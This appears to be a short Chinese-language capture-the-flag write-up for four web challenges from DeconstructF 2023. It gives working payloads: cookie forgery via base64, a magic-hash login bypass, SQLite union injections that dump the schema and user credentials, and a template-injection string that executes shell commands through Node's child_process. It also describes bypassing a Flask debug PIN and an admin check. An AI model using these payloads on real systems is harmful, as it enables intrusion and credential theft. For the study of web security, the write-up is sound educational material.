Deconstructf-2023-WEB

比赛比较简单，只做web，也是ak了。

where-are-the-cookies

 查看robots.txt

cookie是no的base64编码，改成yes的base64即可

 

 

why-are-types-weird

 password为  sha1('aaroZmOk') //0e66507019969427134894567494305185566735，sha1后开头是0通过若比较，登入进去

尝试注入，根据报错发现是sqlite，进行注入

-1 union select 1,2,(select sql from sqlite_master limit 0,1)--

-1 union select 1,2,(select group_concat(username,password) from power_users);

 

 

 

debugzero

 访问console，可以发现是flask

 一开始以为是伪造pin码，发现没有地方可以读取文件或者ssti。实际上是一开始的解码源码

打开css可以发现pin码。。。

 

 

 

gitcha

git泄露，拿到源码

注意到这里有渲染，尝试ssti

 checkAdmin直接改cookie绕过即可

注入

{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat flag.txt')")()}}